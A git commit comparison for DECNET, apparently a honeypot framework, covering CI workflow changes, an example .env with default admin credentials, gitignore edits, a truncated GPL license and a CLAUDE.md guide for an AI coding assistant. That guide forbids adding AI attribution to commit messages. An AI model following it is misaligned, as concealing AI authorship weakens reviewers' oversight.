Compare commits
3 Commits
89268f19fb
...
v0.1.0
| Author | SHA1 | Date | |
|---|---|---|---|
| 897f498bcd | |||
| 92e06cb193 | |||
| 7ad7e1e53b |
12
.env.example
12
.env.example
@@ -1,12 +0,0 @@
|
||||
# API Options
|
||||
DECNET_API_HOST=0.0.0.0
|
||||
DECNET_API_PORT=8000
|
||||
DECNET_JWT_SECRET=supersecretkey12345678901234567
|
||||
DECNET_INGEST_LOG_FILE=/var/log/decnet/decnet.log
|
||||
|
||||
# Web Dashboard Options
|
||||
DECNET_WEB_HOST=0.0.0.0
|
||||
DECNET_WEB_PORT=8080
|
||||
DECNET_ADMIN_USER=admin
|
||||
DECNET_ADMIN_PASSWORD=admin
|
||||
DECNET_DEVELOPER=False
|
||||
@@ -2,10 +2,7 @@ name: CI
|
||||
|
||||
on:
|
||||
push:
|
||||
branches: [dev, testing, "temp/merge-*"]
|
||||
paths-ignore:
|
||||
- "**/*.md"
|
||||
- "docs/**"
|
||||
branches: [dev, testing]
|
||||
|
||||
jobs:
|
||||
lint:
|
||||
@@ -17,7 +14,21 @@ jobs:
|
||||
with:
|
||||
python-version: "3.11"
|
||||
- run: pip install ruff
|
||||
- run: ruff check decnet/
|
||||
- run: ruff check .
|
||||
|
||||
test:
|
||||
name: Test (pytest)
|
||||
runs-on: ubuntu-latest
|
||||
strategy:
|
||||
matrix:
|
||||
python-version: ["3.11", "3.12"]
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: actions/setup-python@v5
|
||||
with:
|
||||
python-version: ${{ matrix.python-version }}
|
||||
- run: pip install -e .
|
||||
- run: pytest tests/ -v --tb=short
|
||||
|
||||
bandit:
|
||||
name: SAST (bandit)
|
||||
@@ -28,7 +39,7 @@ jobs:
|
||||
with:
|
||||
python-version: "3.11"
|
||||
- run: pip install bandit
|
||||
- run: bandit -r decnet/ -ll -x decnet/services/registry.py -x decnet/templates/
|
||||
- run: bandit -r decnet/ -ll -x decnet/services/registry.py
|
||||
|
||||
pip-audit:
|
||||
name: Dependency audit (pip-audit)
|
||||
@@ -39,120 +50,37 @@ jobs:
|
||||
with:
|
||||
python-version: "3.11"
|
||||
- run: pip install pip-audit
|
||||
- run: pip install -e .[dev]
|
||||
- run: pip-audit --skip-editable --ignore-vuln CVE-2025-65896 --ignore-vuln CVE-2026-3219
|
||||
- run: pip install -e .
|
||||
- run: pip-audit --skip-editable
|
||||
|
||||
test-standard:
|
||||
name: Test (Standard)
|
||||
open-pr:
|
||||
name: Open PR to main
|
||||
runs-on: ubuntu-latest
|
||||
needs: [lint, bandit, pip-audit]
|
||||
strategy:
|
||||
matrix:
|
||||
python-version: ["3.11"]
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: actions/setup-python@v5
|
||||
with:
|
||||
python-version: ${{ matrix.python-version }}
|
||||
- run: pip install -e .[dev]
|
||||
- run: pytest
|
||||
|
||||
test-live:
|
||||
name: Test (Live)
|
||||
runs-on: ubuntu-latest
|
||||
needs: [test-standard]
|
||||
services:
|
||||
mysql:
|
||||
image: mysql:8.0
|
||||
env:
|
||||
MYSQL_ROOT_PASSWORD: root
|
||||
MYSQL_DATABASE: decnet_test
|
||||
ports:
|
||||
- 3307:3306
|
||||
options: >-
|
||||
--health-cmd="mysqladmin ping -h 127.0.0.1"
|
||||
--health-interval=10s
|
||||
--health-timeout=5s
|
||||
--health-retries=5
|
||||
strategy:
|
||||
matrix:
|
||||
python-version: ["3.11"]
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: actions/setup-python@v5
|
||||
with:
|
||||
python-version: ${{ matrix.python-version }}
|
||||
- run: pip install -e .[dev]
|
||||
- run: pytest -m live
|
||||
env:
|
||||
DECNET_MYSQL_HOST: 127.0.0.1
|
||||
DECNET_MYSQL_PORT: 3307
|
||||
DECNET_MYSQL_USER: root
|
||||
DECNET_MYSQL_PASSWORD: root
|
||||
DECNET_MYSQL_DATABASE: decnet_test
|
||||
|
||||
merge-to-testing:
|
||||
name: Merge dev → testing
|
||||
runs-on: ubuntu-latest
|
||||
needs: [test-standard, test-live]
|
||||
needs: [lint, test, bandit, pip-audit]
|
||||
if: github.ref == 'refs/heads/dev'
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
token: ${{ secrets.DECNET_PR_TOKEN }}
|
||||
- name: Configure git
|
||||
- name: Open PR via Gitea API
|
||||
run: |
|
||||
git config user.name "DECNET CI"
|
||||
git config user.email "ci@decnet.local"
|
||||
- name: Merge dev into testing
|
||||
run: |
|
||||
git fetch origin testing
|
||||
git checkout testing
|
||||
git merge origin/dev --no-ff -m "ci: auto-merge dev → testing [skip ci]"
|
||||
git push origin testing
|
||||
|
||||
prepare-merge-to-main:
|
||||
name: Prepare Merge to Main
|
||||
runs-on: ubuntu-latest
|
||||
needs: [test-standard, test-live, test-fuzz]
|
||||
if: github.ref == 'refs/heads/testing'
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
token: ${{ secrets.DECNET_PR_TOKEN }}
|
||||
- name: Configure git
|
||||
run: |
|
||||
git config user.name "DECNET CI"
|
||||
git config user.email "ci@decnet.local"
|
||||
- name: Create temp branch and sync with main
|
||||
run: |
|
||||
git fetch origin main
|
||||
git checkout -b temp/merge-testing-to-main
|
||||
echo "--- Switched to temp branch, merging main into it ---"
|
||||
git merge origin/main --no-edit || { echo "CONFLICT: Manual resolution required"; exit 1; }
|
||||
git push origin temp/merge-testing-to-main --force
|
||||
|
||||
finalize-merge-to-main:
|
||||
name: Finalize Merge to Main
|
||||
runs-on: ubuntu-latest
|
||||
needs: [test-standard, test-live, test-fuzz]
|
||||
if: startsWith(github.ref, 'refs/heads/temp/merge-')
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
token: ${{ secrets.DECNET_PR_TOKEN }}
|
||||
- name: Configure git
|
||||
run: |
|
||||
git config user.name "DECNET CI"
|
||||
git config user.email "ci@decnet.local"
|
||||
- name: Merge RC into main
|
||||
run: |
|
||||
git fetch origin main
|
||||
git checkout main
|
||||
git merge ${{ github.ref }} --no-ff -m "ci: auto-merge testing → main"
|
||||
git push origin main
|
||||
echo "--- Cleaning up temp branch ---"
|
||||
git push origin --delete ${{ github.ref_name }}
|
||||
echo "--- Checking for existing open PRs ---"
|
||||
LIST_RESPONSE=$(curl -s \
|
||||
-H "Authorization: token ${{ secrets.DECNET_PR_TOKEN }}" \
|
||||
"https://git.resacachile.cl/api/v1/repos/anti/DECNET/pulls?state=open&head=anti:dev&base=main&limit=5")
|
||||
echo "$LIST_RESPONSE"
|
||||
EXISTING=$(echo "$LIST_RESPONSE" | python3 -c "import sys, json; print(len(json.load(sys.stdin)))")
|
||||
echo "Open PRs found: $EXISTING"
|
||||
if [ "$EXISTING" -gt "0" ]; then
|
||||
echo "PR already open, skipping."
|
||||
exit 0
|
||||
fi
|
||||
echo "--- Creating PR ---"
|
||||
CREATE_RESPONSE=$(curl -s -X POST \
|
||||
-H "Authorization: token ${{ secrets.DECNET_PR_TOKEN }}" \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"title": "Auto PR: dev → main",
|
||||
"head": "dev",
|
||||
"base": "main",
|
||||
"body": "All CI and security checks passed. Review and merge when ready."
|
||||
}' \
|
||||
"https://git.resacachile.cl/api/v1/repos/anti/DECNET/pulls")
|
||||
echo "$CREATE_RESPONSE"
|
||||
|
||||
@@ -3,9 +3,6 @@ name: PR Gate
|
||||
on:
|
||||
pull_request:
|
||||
branches: [main]
|
||||
paths-ignore:
|
||||
- "**/*.md"
|
||||
- "docs/**"
|
||||
|
||||
jobs:
|
||||
lint:
|
||||
@@ -30,28 +27,5 @@ jobs:
|
||||
- uses: actions/setup-python@v5
|
||||
with:
|
||||
python-version: ${{ matrix.python-version }}
|
||||
- run: pip install -e .[dev]
|
||||
- run: pip install -e .
|
||||
- run: pytest tests/ -v --tb=short
|
||||
|
||||
bandit:
|
||||
name: SAST (bandit)
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: actions/setup-python@v5
|
||||
with:
|
||||
python-version: "3.11"
|
||||
- run: pip install bandit
|
||||
- run: bandit -r decnet/ -ll -x decnet/services/registry.py
|
||||
|
||||
pip-audit:
|
||||
name: Dependency audit (pip-audit)
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: actions/setup-python@v5
|
||||
with:
|
||||
python-version: "3.11"
|
||||
- run: pip install pip-audit
|
||||
- run: pip install -e .[dev]
|
||||
- run: pip-audit --skip-editable
|
||||
|
||||
@@ -3,9 +3,6 @@ name: Release
|
||||
on:
|
||||
push:
|
||||
branches: [main]
|
||||
paths-ignore:
|
||||
- "**/*.md"
|
||||
- "docs/**"
|
||||
|
||||
env:
|
||||
REGISTRY: git.resacachile.cl
|
||||
@@ -22,42 +19,27 @@ jobs:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
token: ${{ secrets.DECNET_PR_TOKEN }}
|
||||
|
||||
- name: Configure git
|
||||
run: |
|
||||
git config user.name "DECNET CI"
|
||||
git config user.email "ci@decnet.local"
|
||||
|
||||
- name: Bump version and Tag
|
||||
- name: Extract version from pyproject.toml
|
||||
id: version
|
||||
run: |
|
||||
# Calculate next version (v0.x)
|
||||
LATEST_TAG=$(git describe --tags --abbrev=0 2>/dev/null || echo "v0.0.0")
|
||||
NEXT_VER=$(python3 -c "
|
||||
tag = '$LATEST_TAG'.lstrip('v')
|
||||
parts = tag.split('.')
|
||||
major = int(parts[0]) if parts[0] else 0
|
||||
minor = int(parts[1]) if len(parts) > 1 else 0
|
||||
print(f'{major}.{minor + 1}.0')
|
||||
")
|
||||
|
||||
echo "Next version: $NEXT_VER (calculated from $LATEST_TAG)"
|
||||
|
||||
# Update pyproject.toml
|
||||
sed -i "s/^version = \".*\"/version = \"$NEXT_VER\"/" pyproject.toml
|
||||
|
||||
git add pyproject.toml
|
||||
git commit -m "chore: auto-release v$NEXT_VER [skip ci]" || echo "No changes to commit"
|
||||
CHANGELOG=$(git log ${LATEST_TAG}..HEAD --oneline --no-decorate --no-merges)
|
||||
git tag -a "v$NEXT_VER" -m "Auto-release v$NEXT_VER
|
||||
VERSION=$(python3 -c "import tomllib; f=open('pyproject.toml','rb'); d=tomllib.load(f); print(d['project']['version'])")
|
||||
echo "version=$VERSION" >> $GITHUB_OUTPUT
|
||||
|
||||
Changes since $LATEST_TAG:
|
||||
$CHANGELOG"
|
||||
git push origin main --follow-tags
|
||||
|
||||
echo "version=$NEXT_VER" >> $GITHUB_OUTPUT
|
||||
echo "created=true" >> $GITHUB_OUTPUT
|
||||
- name: Create tag if not exists
|
||||
id: tag
|
||||
run: |
|
||||
VERSION=${{ steps.version.outputs.version }}
|
||||
if git rev-parse "v$VERSION" >/dev/null 2>&1; then
|
||||
echo "Tag v$VERSION already exists, skipping."
|
||||
echo "created=false" >> $GITHUB_OUTPUT
|
||||
else
|
||||
git config user.name "gitea-actions"
|
||||
git config user.email "actions@git.resacachile.cl"
|
||||
git tag -a "v$VERSION" -m "Release v$VERSION"
|
||||
git push origin "v$VERSION"
|
||||
echo "created=true" >> $GITHUB_OUTPUT
|
||||
fi
|
||||
|
||||
docker:
|
||||
name: Build, scan & push ${{ matrix.service }}
|
||||
@@ -67,7 +49,7 @@ $CHANGELOG"
|
||||
fail-fast: false
|
||||
matrix:
|
||||
service:
|
||||
- conpot
|
||||
- cowrie
|
||||
- docker_api
|
||||
- elasticsearch
|
||||
- ftp
|
||||
@@ -84,12 +66,11 @@ $CHANGELOG"
|
||||
- postgres
|
||||
- rdp
|
||||
- redis
|
||||
- real_ssh
|
||||
- sip
|
||||
- smb
|
||||
- smtp
|
||||
- snmp
|
||||
- ssh
|
||||
- telnet
|
||||
- tftp
|
||||
- vnc
|
||||
steps:
|
||||
@@ -115,13 +96,13 @@ $CHANGELOG"
|
||||
cache-from: type=gha
|
||||
cache-to: type=gha,mode=max
|
||||
|
||||
- name: Install Trivy
|
||||
run: |
|
||||
curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin
|
||||
|
||||
- name: Scan with Trivy
|
||||
run: |
|
||||
trivy image --exit-code 1 --severity CRITICAL --ignore-unfixed decnet-${{ matrix.service }}:scan
|
||||
uses: aquasecurity/trivy-action@master
|
||||
with:
|
||||
image-ref: decnet-${{ matrix.service }}:scan
|
||||
exit-code: "1"
|
||||
severity: CRITICAL
|
||||
ignore-unfixed: true
|
||||
|
||||
- name: Push image
|
||||
if: success()
|
||||
|
||||
39
.gitignore
vendored
39
.gitignore
vendored
@@ -1,10 +1,4 @@
|
||||
.venv/
|
||||
.venv*/
|
||||
.311/
|
||||
.3[0-9][0-9]/
|
||||
logs/
|
||||
.claude/*
|
||||
CLAUDE.md
|
||||
__pycache__/
|
||||
*.pyc
|
||||
*.pyo
|
||||
@@ -12,42 +6,13 @@ __pycache__/
|
||||
dist/
|
||||
build/
|
||||
decnet-compose.yml
|
||||
# Per-topology compose fragments emitted by `decnet topology deploy`.
|
||||
decnet-topology-*-compose.yml
|
||||
# Docker build context cache.
|
||||
.docker/
|
||||
decnet-state.json
|
||||
*.ini
|
||||
.env
|
||||
decnet.log*
|
||||
*.loggy
|
||||
*.nmap
|
||||
linterfails.log
|
||||
test-scan
|
||||
webmail
|
||||
windows1
|
||||
*.db
|
||||
*.db-shm
|
||||
*.db-wal
|
||||
decnet.*.log
|
||||
# Rotated copies (logrotate appends .1, .2, .gz...) — the existing
|
||||
# decnet.*.log glob doesn't catch the suffix.
|
||||
decnet.*.log.*
|
||||
decnet.json
|
||||
.env*
|
||||
.env.local
|
||||
.coverage
|
||||
.hypothesis/
|
||||
profiles/*
|
||||
tests/test_decnet.db*
|
||||
|
||||
# Nested git clone of the wiki — not a submodule, just a local
|
||||
# working copy so we can edit docs without a full round-trip.
|
||||
wiki-checkout/
|
||||
|
||||
# Scratch test/debug outputs that leak from saved `pytest > hang.log`
|
||||
# or `pytest > schem` redirections.
|
||||
hang.log
|
||||
schem
|
||||
*.pytest.log
|
||||
|
||||
# pydeps-style dependency graph dumps from local analysis runs.
|
||||
deps.txt
|
||||
|
||||
57
CLAUDE.md
Normal file
57
CLAUDE.md
Normal file
@@ -0,0 +1,57 @@
|
||||
# CLAUDE.md
|
||||
|
||||
This file provides guidance to Claude Code (claude.ai/code) when working with code in this repository.
|
||||
|
||||
## Commands
|
||||
|
||||
```bash
|
||||
# Install (dev)
|
||||
pip install -e .
|
||||
|
||||
# List registered service plugins
|
||||
decnet services
|
||||
|
||||
# Dry-run (generates compose, no containers)
|
||||
decnet deploy --mode unihost --deckies 3 --randomize-services --dry-run
|
||||
|
||||
# Full deploy (requires root for MACVLAN)
|
||||
sudo decnet deploy --mode unihost --deckies 5 --interface eth0 --randomize-services
|
||||
sudo decnet deploy --mode unihost --deckies 3 --services ssh,smb --log-target 192.168.1.5:5140
|
||||
|
||||
# Status / teardown
|
||||
decnet status
|
||||
sudo decnet teardown --all
|
||||
sudo decnet teardown --id decky-01
|
||||
```
|
||||
|
||||
## Project Overview
|
||||
|
||||
DECNET is a honeypot/deception network framework. It deploys fake machines (called **deckies**) with realistic services (RDP, SMB, SSH, FTP, etc.) to lure and profile attackers. All attacker interactions are aggregated to an isolated logging network (ELK stack / SIEM).
|
||||
|
||||
## Deployment Models
|
||||
|
||||
**UNIHOST** — one real host spins up _n_ deckies via a container orchestrator. Simpler, single-machine deployment.
|
||||
|
||||
**SWARM (MULTIHOST)** — _n_ real hosts each running deckies. Orchestrated via Ansible/sshpass or similar tooling.
|
||||
|
||||
## Core Technology Choices
|
||||
|
||||
- **Containers**: Docker Compose is the starting point but other orchestration frameworks should be evaluated if they serve the project better. `debian:bookworm-slim` is the default base image; mixing in Ubuntu, CentOS, or other distros is encouraged to make the decoy network look heterogeneous.
|
||||
- **Networking**: Deckies need to appear as real machines on the LAN (own MACs/IPs). MACVLAN and IPVLAN are candidates; the right driver depends on the host environment. WSL has known limitations — bare metal or a VM is preferred for testing.
|
||||
- **Log pipeline**: Logstash → ELK stack → SIEM (isolated network, not reachable from decoy network)
|
||||
|
||||
## Architecture Constraints
|
||||
|
||||
- The decoy network must be reachable from the outside (attacker-facing).
|
||||
- The logging/aggregation network must be isolated from the decoy network.
|
||||
- A publicly accessible real server acts as the bridge between the two networks.
|
||||
- Deckies should differ in exposed services and OS fingerprints to appear as a heterogeneous network.
|
||||
|
||||
## Development and testing
|
||||
|
||||
- For every new feature, pytests must me made.
|
||||
- Pytest is the main testing framework in use.
|
||||
- NEVER pass broken code to the user.
|
||||
- Broken means: not running, not passing 100% tests, etc.
|
||||
- After tests pass with 100%, always git commit your changes.
|
||||
- NEVER add "Co-Authored-By" or any Claude attribution lines to git commit messages.
|
||||
1
DEVELOPMENT.md
Normal file
1
DEVELOPMENT.md
Normal file
@@ -0,0 +1 @@
|
||||
CI/CD TEST 2
|
||||
674
LICENSE
674
LICENSE
@@ -1,674 +0,0 @@
|
||||
GNU GENERAL PUBLIC LICENSE
|
||||
Version 3, 29 June 2007
|
||||
|
||||
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
|
||||
Everyone is permitted to copy and distribute verbatim copies
|
||||
of this license document, but changing it is not allowed.
|
||||
|
||||
Preamble
|
||||
|
||||
The GNU General Public License is a free, copyleft license for
|
||||
software and other kinds of works.
|
||||
|
||||
The licenses for most software and other practical works are designed
|
||||
to take away your freedom to share and change the works. By contrast,
|
||||
the GNU General Public License is intended to guarantee your freedom to
|
||||
share and change all versions of a program--to make sure it remains free
|
||||
software for all its users. We, the Free Software Foundation, use the
|
||||
GNU General Public License for most of our software; it applies also to
|
||||
any other work released this way by its authors. You can apply it to
|
||||
your programs, too.
|
||||
|
||||
When we speak of free software, we are referring to freedom, not
|
||||
price. Our General Public Licenses are designed to make sure that you
|
||||
have the freedom to distribute copies of free software (and charge for
|
||||
them if you wish), that you receive source code or can get it if you
|
||||
want it, that you can change the software or use pieces of it in new
|
||||
free programs, and that you know you can do these things.
|
||||
|
||||
To protect your rights, we need to prevent others from denying you
|
||||
these rights or asking you to surrender the rights. Therefore, you have
|
||||
certain responsibilities if you distribute copies of the software, or if
|
||||
you modify it: responsibilities to respect the freedom of others.
|
||||
|
||||
For example, if you distribute copies of such a program, whether
|
||||
gratis or for a fee, you must pass on to the recipients the same
|
||||
freedoms that you received. You must make sure that they, too, receive
|
||||
or can get the source code. And you must show them these terms so they
|
||||
know their rights.
|
||||
|
||||
Developers that use the GNU GPL protect your rights with two steps:
|
||||
(1) assert copyright on the software, and (2) offer you this License
|
||||
giving you legal permission to copy, distribute and/or modify it.
|
||||
|
||||
For the developers' and authors' protection, the GPL clearly explains
|
||||
that there is no warranty for this free software. For both users' and
|
||||
authors' sake, the GPL requires that modified versions be marked as
|
||||
changed, so that their problems will not be attributed erroneously to
|
||||
authors of previous versions.
|
||||
|
||||
Some devices are designed to deny users access to install or run
|
||||
modified versions of the software inside them, although the manufacturer
|
||||
can do so. This is fundamentally incompatible with the aim of
|
||||
protecting users' freedom to change the software. The systematic
|
||||
pattern of such abuse occurs in the area of products for individuals to
|
||||
use, which is precisely where it is most unacceptable. Therefore, we
|
||||
have designed this version of the GPL to prohibit the practice for those
|
||||
products. If such problems arise substantially in other domains, we
|
||||
stand ready to extend this provision to those domains in future versions
|
||||
of the GPL, as needed to protect the freedom of users.
|
||||
|
||||
Finally, every program is threatened constantly by software patents.
|
||||
States should not allow patents to restrict development and use of
|
||||
software on general-purpose computers, but in those that do, we wish to
|
||||
avoid the special danger that patents applied to a free program could
|
||||
make it effectively proprietary. To prevent this, the GPL assures that
|
||||
patents cannot be used to render the program non-free.
|
||||
|
||||
The precise terms and conditions for copying, distribution and
|
||||
modification follow.
|
||||
|
||||
TERMS AND CONDITIONS
|
||||
|
||||
0. Definitions.
|
||||
|
||||
"This License" refers to version 3 of the GNU General Public License.
|
||||
|
||||
"Copyright" also means copyright-like laws that apply to other kinds of
|
||||
works, such as semiconductor masks.
|
||||
|
||||
"The Program" refers to any copyrightable work licensed under this
|
||||
License. Each licensee is addressed as "you". "Licensees" and
|
||||
"recipients" may be individuals or organizations.
|
||||
|
||||
To "modify" a work means to copy from or adapt all or part of the work
|
||||
in a fashion requiring copyright permission, other than the making of an
|
||||
exact copy. The resulting work is called a "modified version" of the
|
||||
earlier work or a work "based on" the earlier work.
|
||||
|
||||
A "covered work" means either the unmodified Program or a work based
|
||||
on the Program.
|
||||
|
||||
To "propagate" a work means to do anything with it that, without
|
||||
permission, would make you directly or secondarily liable for
|
||||
infringement under applicable copyright law, except executing it on a
|
||||
computer or modifying a private copy. Propagation includes copying,
|
||||
distribution (with or without modification), making available to the
|
||||
public, and in some countries other activities as well.
|
||||
|
||||
To "convey" a work means any kind of propagation that enables other
|
||||
parties to make or receive copies. Mere interaction with a user through
|
||||
a computer network, with no transfer of a copy, is not conveying.
|
||||
|
||||
An interactive user interface displays "Appropriate Legal Notices"
|
||||
to the extent that it includes a convenient and prominently visible
|
||||
feature that (1) displays an appropriate copyright notice, and (2)
|
||||
tells the user that there is no warranty for the work (except to the
|
||||
extent that warranties are provided), that licensees may convey the
|
||||
work under this License, and how to view a copy of this License. If
|
||||
the interface presents a list of user commands or options, such as a
|
||||
menu, a prominent item in the list meets this criterion.
|
||||
|
||||
1. Source Code.
|
||||
|
||||
The "source code" for a work means the preferred form of the work
|
||||
for making modifications to it. "Object code" means any non-source
|
||||
form of a work.
|
||||
|
||||
A "Standard Interface" means an interface that either is an official
|
||||
standard defined by a recognized standards body, or, in the case of
|
||||
interfaces specified for a particular programming language, one that
|
||||
is widely used among developers working in that language.
|
||||
|
||||
The "System Libraries" of an executable work include anything, other
|
||||
than the work as a whole, that (a) is included in the normal form of
|
||||
packaging a Major Component, but which is not part of that Major
|
||||
Component, and (b) serves only to enable use of the work with that
|
||||
Major Component, or to implement a Standard Interface for which an
|
||||
implementation is available to the public in source code form. A
|
||||
"Major Component", in this context, means a major essential component
|
||||
(kernel, window system, and so on) of the specific operating system
|
||||
(if any) on which the executable work runs, or a compiler used to
|
||||
produce the work, or an object code interpreter used to run it.
|
||||
|
||||
The "Corresponding Source" for a work in object code form means all
|
||||
the source code needed to generate, install, and (for an executable
|
||||
work) run the object code and to modify the work, including scripts to
|
||||
control those activities. However, it does not include the work's
|
||||
System Libraries, or general-purpose tools or generally available free
|
||||
programs which are used unmodified in performing those activities but
|
||||
which are not part of the work. For example, Corresponding Source
|
||||
includes interface definition files associated with source files for
|
||||
the work, and the source code for shared libraries and dynamically
|
||||
linked subprograms that the work is specifically designed to require,
|
||||
such as by intimate data communication or control flow between those
|
||||
subprograms and other parts of the work.
|
||||
|
||||
The Corresponding Source need not include anything that users
|
||||
can regenerate automatically from other parts of the Corresponding
|
||||
Source.
|
||||
|
||||
The Corresponding Source for a work in source code form is that
|
||||
same work.
|
||||
|
||||
2. Basic Permissions.
|
||||
|
||||
All rights granted under this License are granted for the term of
|
||||
copyright on the Program, and are irrevocable provided the stated
|
||||
conditions are met. This License explicitly affirms your unlimited
|
||||
permission to run the unmodified Program. The output from running a
|
||||
covered work is covered by this License only if the output, given its
|
||||
content, constitutes a covered work. This License acknowledges your
|
||||
rights of fair use or other equivalent, as provided by copyright law.
|
||||
|
||||
You may make, run and propagate covered works that you do not
|
||||
convey, without conditions so long as your license otherwise remains
|
||||
in force. You may convey covered works to others for the sole purpose
|
||||
of having them make modifications exclusively for you, or provide you
|
||||
with facilities for running those works, provided that you comply with
|
||||
the terms of this License in conveying all material for which you do
|
||||
not control copyright. Those thus making or running the covered works
|
||||
for you must do so exclusively on your behalf, under your direction
|
||||
and control, on terms that prohibit them from making any copies of
|
||||
your copyrighted material outside their relationship with you.
|
||||
|
||||
Conveying under any other circumstances is permitted solely under
|
||||
the conditions stated below. Sublicensing is not allowed; section 10
|
||||
makes it unnecessary.
|
||||
|
||||
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
|
||||
|
||||
No covered work shall be deemed part of an effective technological
|
||||
measure under any applicable law fulfilling obligations under article
|
||||
11 of the WIPO copyright treaty adopted on 20 December 1996, or
|
||||
similar laws prohibiting or restricting circumvention of such
|
||||
measures.
|
||||
|
||||
When you convey a covered work, you waive any legal power to forbid
|
||||
circumvention of technological measures to the extent such circumvention
|
||||
is effected by exercising rights under this License with respect to
|
||||
the covered work, and you disclaim any intention to limit operation or
|
||||
modification of the work as a means of enforcing, against the work's
|
||||
users, your or third parties' legal rights to forbid circumvention of
|
||||
technological measures.
|
||||
|
||||
4. Conveying Verbatim Copies.
|
||||
|
||||
You may convey verbatim copies of the Program's source code as you
|
||||
receive it, in any medium, provided that you conspicuously and
|
||||
appropriately publish on each copy an appropriate copyright notice;
|
||||
keep intact all notices stating that this License and any
|
||||
non-permissive terms added in accord with section 7 apply to the code;
|
||||
keep intact all notices of the absence of any warranty; and give all
|
||||
recipients a copy of this License along with the Program.
|
||||
|
||||
You may charge any price or no price for each copy that you convey,
|
||||
and you may offer support or warranty protection for a fee.
|
||||
|
||||
5. Conveying Modified Source Versions.
|
||||
|
||||
You may convey a work based on the Program, or the modifications to
|
||||
produce it from the Program, in the form of source code under the
|
||||
terms of section 4, provided that you also meet all of these conditions:
|
||||
|
||||
a) The work must carry prominent notices stating that you modified
|
||||
it, and giving a relevant date.
|
||||
|
||||
b) The work must carry prominent notices stating that it is
|
||||
released under this License and any conditions added under section
|
||||
7. This requirement modifies the requirement in section 4 to
|
||||
"keep intact all notices".
|
||||
|
||||
c) You must license the entire work, as a whole, under this
|
||||
License to anyone who comes into possession of a copy. This
|
||||
License will therefore apply, along with any applicable section 7
|
||||
additional terms, to the whole of the work, and all its parts,
|
||||
regardless of how they are packaged. This License gives no
|
||||
permission to license the work in any other way, but it does not
|
||||
invalidate such permission if you have separately received it.
|
||||
|
||||
d) If the work has interactive user interfaces, each must display
|
||||
Appropriate Legal Notices; however, if the Program has interactive
|
||||
interfaces that do not display Appropriate Legal Notices, your
|
||||
work need not make them do so.
|
||||
|
||||
A compilation of a covered work with other separate and independent
|
||||
works, which are not by their nature extensions of the covered work,
|
||||
and which are not combined with it such as to form a larger program,
|
||||
in or on a volume of a storage or distribution medium, is called an
|
||||
"aggregate" if the compilation and its resulting copyright are not
|
||||
used to limit the access or legal rights of the compilation's users
|
||||
beyond what the individual works permit. Inclusion of a covered work
|
||||
in an aggregate does not cause this License to apply to the other
|
||||
parts of the aggregate.
|
||||
|
||||
6. Conveying Non-Source Forms.
|
||||
|
||||
You may convey a covered work in object code form under the terms
|
||||
of sections 4 and 5, provided that you also convey the
|
||||
machine-readable Corresponding Source under the terms of this License,
|
||||
in one of these ways:
|
||||
|
||||
a) Convey the object code in, or embodied in, a physical product
|
||||
(including a physical distribution medium), accompanied by the
|
||||
Corresponding Source fixed on a durable physical medium
|
||||
customarily used for software interchange.
|
||||
|
||||
b) Convey the object code in, or embodied in, a physical product
|
||||
(including a physical distribution medium), accompanied by a
|
||||
written offer, valid for at least three years and valid for as
|
||||
long as you offer spare parts or customer support for that product
|
||||
model, to give anyone who possesses the object code either (1) a
|
||||
copy of the Corresponding Source for all the software in the
|
||||
product that is covered by this License, on a durable physical
|
||||
medium customarily used for software interchange, for a price no
|
||||
more than your reasonable cost of physically performing this
|
||||
conveying of source, or (2) access to copy the
|
||||
Corresponding Source from a network server at no charge.
|
||||
|
||||
c) Convey individual copies of the object code with a copy of the
|
||||
written offer to provide the Corresponding Source. This
|
||||
alternative is allowed only occasionally and noncommercially, and
|
||||
only if you received the object code with such an offer, in accord
|
||||
with subsection 6b.
|
||||
|
||||
d) Convey the object code by offering access from a designated
|
||||
place (gratis or for a charge), and offer equivalent access to the
|
||||
Corresponding Source in the same way through the same place at no
|
||||
further charge. You need not require recipients to copy the
|
||||
Corresponding Source along with the object code. If the place to
|
||||
copy the object code is a network server, the Corresponding Source
|
||||
may be on a different server (operated by you or a third party)
|
||||
that supports equivalent copying facilities, provided you maintain
|
||||
clear directions next to the object code saying where to find the
|
||||
Corresponding Source. Regardless of what server hosts the
|
||||
Corresponding Source, you remain obligated to ensure that it is
|
||||
available for as long as needed to satisfy these requirements.
|
||||
|
||||
e) Convey the object code using peer-to-peer transmission, provided
|
||||
you inform other peers where the object code and Corresponding
|
||||
Source of the work are being offered to the general public at no
|
||||
charge under subsection 6d.
|
||||
|
||||
A separable portion of the object code, whose source code is excluded
|
||||
from the Corresponding Source as a System Library, need not be
|
||||
included in conveying the object code work.
|
||||
|
||||
A "User Product" is either (1) a "consumer product", which means any
|
||||
tangible personal property which is normally used for personal, family,
|
||||
or household purposes, or (2) anything designed or sold for incorporation
|
||||
into a dwelling. In determining whether a product is a consumer product,
|
||||
doubtful cases shall be resolved in favor of coverage. For a particular
|
||||
product received by a particular user, "normally used" refers to a
|
||||
typical or common use of that class of product, regardless of the status
|
||||
of the particular user or of the way in which the particular user
|
||||
actually uses, or expects or is expected to use, the product. A product
|
||||
is a consumer product regardless of whether the product has substantial
|
||||
commercial, industrial or non-consumer uses, unless such uses represent
|
||||
the only significant mode of use of the product.
|
||||
|
||||
"Installation Information" for a User Product means any methods,
|
||||
procedures, authorization keys, or other information required to install
|
||||
and execute modified versions of a covered work in that User Product from
|
||||
a modified version of its Corresponding Source. The information must
|
||||
suffice to ensure that the continued functioning of the modified object
|
||||
code is in no case prevented or interfered with solely because
|
||||
modification has been made.
|
||||
|
||||
If you convey an object code work under this section in, or with, or
